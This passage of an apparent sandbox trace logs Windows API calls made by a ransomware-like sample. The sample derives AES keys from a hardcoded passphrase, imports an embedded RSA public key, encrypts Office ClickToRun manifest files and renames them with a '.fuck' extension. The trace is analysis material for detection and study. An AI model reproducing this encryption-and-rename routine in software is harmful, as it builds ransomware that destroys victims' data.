phHash=0x2b9dcd4) returned 1 [0235.895] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.895] CryptHashData (hHash=0x27ebce0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.895] CryptDeriveKey (in: hProv=0x27e94c0, Algid=0x6610, hBaseData=0x27ebce0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0235.895] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.895] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.895] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9190) returned 1 [0235.898] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9190, dwCertEncodingType=0x1, pInfo=0x27f6bb8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6be8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f6bf0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb4a0) returned 1 [0235.898] CryptEncrypt (in: hKey=0x27eb4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.898] CryptEncrypt (in: hKey=0x27eb4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9218*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9218*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.898] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9218, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.898] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fe850, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.898] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.899] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.899] CloseHandle (hObject=0xffffffff) returned 1 [0235.899] CloseHandle (hObject=0xffffffff) returned 1 [0235.899] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0235.899] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.900] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.gsg")) returned 0 [0235.900] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml.fuck")) returned 0 [0235.900] CryptDestroyHash (hHash=0x27ebce0) returned 1 [0235.900] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.900] CryptReleaseContext (hProv=0x27e94c0, dwFlags=0x0) returned 1 [0235.900] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.900] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.901] GetLastError () returned 0x5 [0235.901] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml")) returned 0x20 [0235.901] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.901] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.902] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.902] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.902] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e9548) returned 1 [0235.912] CryptCreateHash (in: hProv=0x27e9548, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.912] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.912] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.912] CryptDeriveKey (in: hProv=0x27e9548, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0235.912] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.912] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.912] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e95d0) returned 1 [0235.914] CryptImportPublicKeyInfo (in: hCryptProv=0x27e95d0, dwCertEncodingType=0x1, pInfo=0x27f67a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f67d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f67e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb020) returned 1 [0235.915] CryptEncrypt (in: hKey=0x27eb020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.915] CryptEncrypt (in: hKey=0x27eb020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e9768*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e9768*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e9768, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.915] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fe850, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.915] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.915] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.915] CloseHandle (hObject=0xffffffff) returned 1 [0235.915] CloseHandle (hObject=0xffffffff) returned 1 [0235.915] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0235.916] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0235.916] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.gsg")) returned 0 [0235.916] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml.fuck")) returned 0 [0235.916] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0235.917] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0235.917] CryptReleaseContext (hProv=0x27e9548, dwFlags=0x0) returned 1 [0235.917] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.917] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.917] GetLastError () returned 0x5 [0235.917] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml")) returned 0x20 [0235.918] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0235.918] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.918] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.919] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.919] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e97f0) returned 1 [0235.928] CryptCreateHash (in: hProv=0x27e97f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.928] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.928] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.928] CryptDeriveKey (in: hProv=0x27e97f0, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27eb8a0) returned 1 [0235.928] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.928] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.928] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9cb8) returned 1 [0235.931] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9cb8, dwCertEncodingType=0x1, pInfo=0x27f6fc8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f6ff8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7000*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb520) returned 1 [0235.931] CryptEncrypt (in: hKey=0x27eb520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0235.931] CryptEncrypt (in: hKey=0x27eb520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e93b0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27e93b0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0235.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e93b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.931] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27fe850, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0235.931] CryptEncrypt (in: hKey=0x27eb8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27fe850*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0235.931] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27fe850, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0235.932] CloseHandle (hObject=0xffffffff) returned 1 [0235.932] CloseHandle (hObject=0xffffffff) returned 1 [0235.932] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0235.932] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0235.932] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.gsg")) returned 0 [0235.933] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.fuck")) returned 0 [0235.933] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0235.933] CryptDestroyKey (hKey=0x27eb8a0) returned 1 [0235.933] CryptReleaseContext (hProv=0x27e97f0, dwFlags=0x0) returned 1 [0235.933] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0235.933] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0235.933] GetLastError () returned 0x5 [0235.934] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml")) returned 0x20 [0235.934] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0235.934] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.934] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.935] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.935] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27e97f0) returned 1 [0235.944] CryptCreateHash (in: hProv=0x27e97f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0235.944] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0235.944] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.944] CryptDeriveKey (in: hProv=0x27e97f0, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0235.944] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.944] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0235.944] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27e9878) returned 1 [0235.947] CryptImportPublicKeyInfo (in: hCryptProv=0x27e9878, dwCertEncodingType=0x1, pInfo=0x27f6398*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, 